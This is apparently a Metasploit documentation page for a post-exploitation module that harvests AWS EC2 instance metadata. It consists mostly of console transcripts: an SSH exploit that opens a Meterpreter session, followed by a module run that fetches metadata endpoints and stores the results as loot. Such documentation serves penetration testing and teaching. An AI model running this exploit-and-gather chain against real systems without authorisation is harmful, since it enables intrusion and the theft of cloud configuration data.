adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/post/multi/gather/aws_ec2_instance_metadata.md
T
Jon Hart cf20ccaccd Add kb for aws_ec2_instance_metadata
2016-09-30 07:02:33 -07:00

9.1 KiB
Raw Blame History

Vulnerable Application

This module uses an existing session on an AWS EC2 instance to gather the metadata about the instance. As such, any EC2 instance with curl is an applicable target.

Verification Steps

  1. Get session
  2. Do use post/multi/gather/aws_ec2_instance_metadata
  3. Do set SESSION <session id>
  4. Do run
  5. See loot.

Options

Set VERBOSE to true if you would like the AWS EC2 instance metadata to be shown in addition to being stored.

Scenarios

Default, non-verbose mode:

resource (msf.rc)> use exploit/multi/ssh/sshexec
resource (msf.rc)> set PASSWORD test
PASSWORD => test
resource (msf.rc)> set USERNAME test
USERNAME => test
resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
resource (msf.rc)> set RHOST 192.168.2.2
RHOST => 192.168.2.2
resource (msf.rc)> run -j
[*] Exploit running as background job.
resource (msf.rc)> sleep 10
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] 192.168.2.2:22 - Sending stager...
[*] Command Stager progress -  42.09% done (306/727 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.2
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Meterpreter session 1 opened (192.168.1.149:52075 -> 192.168.2.2:4444) at 2016-09-30 06:40:44 -0700

resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
resource (msf.rc)> set SESSION 1
SESSION => 1
resource (msf.rc)> run
[*] Gathering AWS EC2 instance metadata
[+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930064126_default_192.168.2.2_aws.ec2.instance_509214.txt
[*] Post module execution completed

Non-default, verbose mode:

resource (msf.rc)> use exploit/multi/ssh/sshexec
resource (msf.rc)> set PASSWORD test
PASSWORD => test
resource (msf.rc)> set USERNAME test
USERNAME => test
resource (msf.rc)> set PAYLOAD linux/x86/meterpreter/bind_tcp
PAYLOAD => linux/x86/meterpreter/bind_tcp
resource (msf.rc)> set RHOST 192.168.2.2
RHOST => 192.168.2.2
resource (msf.rc)> run -j
[*] Exploit running as background job.
resource (msf.rc)> sleep 10
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] 192.168.2.2:22 - Sending stager...
[*] Command Stager progress -  42.09% done (306/727 bytes)
[*] Sending stage (1495599 bytes) to 192.168.2.2
[*] Command Stager progress - 100.00% done (727/727 bytes)
[*] Meterpreter session 1 opened (192.168.1.149:52775 -> 192.168.2.2:4444) at 2016-09-30 06:55:54 -0700
resource (msf.rc)> use post/multi/gather/aws_ec2_instance_metadata
resource (msf.rc)> set SESSION 1
SESSION => 1
resource (msf.rc)> set VERBOSE true
VERBOSE => true
resource (msf.rc)> run
[*] Fetching http://169.254.169.254/latest/meta-data/
[*] Gathering AWS EC2 instance metadata
[*] Fetching http://169.254.169.254/latest/meta-data/ami-id
[*] Fetching http://169.254.169.254/latest/meta-data/ami-launch-index
[*] Fetching http://169.254.169.254/latest/meta-data/ami-manifest-path
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/ami
[*] Fetching http://169.254.169.254/latest/meta-data/block-device-mapping/root
[*] Fetching http://169.254.169.254/latest/meta-data/hostname
[*] Fetching http://169.254.169.254/latest/meta-data/instance-action
[*] Fetching http://169.254.169.254/latest/meta-data/instance-id
[*] Fetching http://169.254.169.254/latest/meta-data/instance-type
[*] Fetching http://169.254.169.254/latest/meta-data/local-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/local-ipv4
[*] Fetching http://169.254.169.254/latest/meta-data/mac
[*] Fetching http://169.254.169.254/latest/meta-data/metrics/
[*] Fetching http://169.254.169.254/latest/meta-data/metrics/vhostmd
[*] Fetching http://169.254.169.254/latest/meta-data/network/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/device-number
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/interface-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/ipv4-associations/192.168.2.2
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/local-ipv4s
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/mac
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/owner-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/public-ipv4s
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-group-ids
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/security-groups
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/subnet-ipv4-cidr-block
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-id
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-block
[*] Fetching http://169.254.169.254/latest/meta-data/network/interfaces/macs/aa:bb:cc:dd:ee:ff/vpc-ipv4-cidr-blocks
[*] Fetching http://169.254.169.254/latest/meta-data/placement/
[*] Fetching http://169.254.169.254/latest/meta-data/placement/availability-zone
[*] Fetching http://169.254.169.254/latest/meta-data/profile
[*] Fetching http://169.254.169.254/latest/meta-data/public-hostname
[*] Fetching http://169.254.169.254/latest/meta-data/public-ipv4
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/
[*] Fetching http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
[*] Fetching http://169.254.169.254/latest/meta-data/reservation-id
[*] Fetching http://169.254.169.254/latest/meta-data/security-groups
[*] Fetching http://169.254.169.254/latest/meta-data/services/
[*] Fetching http://169.254.169.254/latest/meta-data/services/domain
[*] Fetching http://169.254.169.254/latest/meta-data/services/partition
[+] AWS EC2 instance metadata
{
  "ami-id": "ami-2d39803a",
  "ami-launch-index": "0",
  "ami-manifest-path": "(unknown)",
  "block-device-mapping": {
    "ami": "/dev/sda1",
    "root": "/dev/sda1"
  },
  "hostname": "ip-192.168.2.2.ec2.internal",
  "instance-action": "none",
  "instance-id": "i-16fffae",
  "instance-type": "t2.medium",
  "local-hostname": "ip-192.168.2.2.ec2.internal",
  "local-ipv4": "192.168.2.2",
  "mac": "aa:bb:cc:dd:ee:ff",
  "metrics": {
    "vhostmd": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
  },
  "network": {
    "interfaces": {
      "macs": {
        "aa:bb:cc:dd:ee:ff": {
          "device-number": "0",
          "interface-id": "eni-1234ff",
          "ipv4-associations": {
            "192.168.2.2": "192.168.2.2"
          },
          "local-hostname": "ip-192.168.2.2.ec2.internal",
          "local-ipv4s": "192.168.2.2",
          "mac": "aa:bb:cc:dd:ee:ff",
          "owner-id": "186638383",
          "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
          "public-ipv4s": "192.168.2.2",
          "security-group-ids": "sg-123a7",
          "security-groups": "launch-wizard-15",
          "subnet-id": "subnet-123453d",
          "subnet-ipv4-cidr-block": "192.0.2.0/24",
          "vpc-id": "vpc-fffffff",
          "vpc-ipv4-cidr-block": "192.0.0.0/16",
          "vpc-ipv4-cidr-blocks": "192.0.0.0/16"
        }
      }
    }
  },
  "placement": {
    "availability-zone": "us-east-1e"
  },
  "profile": "default-hvm",
  "public-hostname": "ec2-192.168.2.2.compute-1.amazonaws.com",
  "public-ipv4": "192.168.2.2",
  "public-keys": {
    "0": {
      "openssh-key": "ssh-rsa <...redacted...> jhart"
    }
  },
  "reservation-id": "r-8675309",
  "security-groups": "launch-wizard-15",
  "services": {
    "domain": "amazonaws.com",
    "partition": "aws"
  }
}
[+] Saved AWS EC2 instance metadata to to /Users/jhart/.msf4/loot/20160930065628_default_192.168.2.2_aws.ec2.instance_622503.txt
[*] Post module execution completed
Reference in New Issue View Git Blame Copy Permalink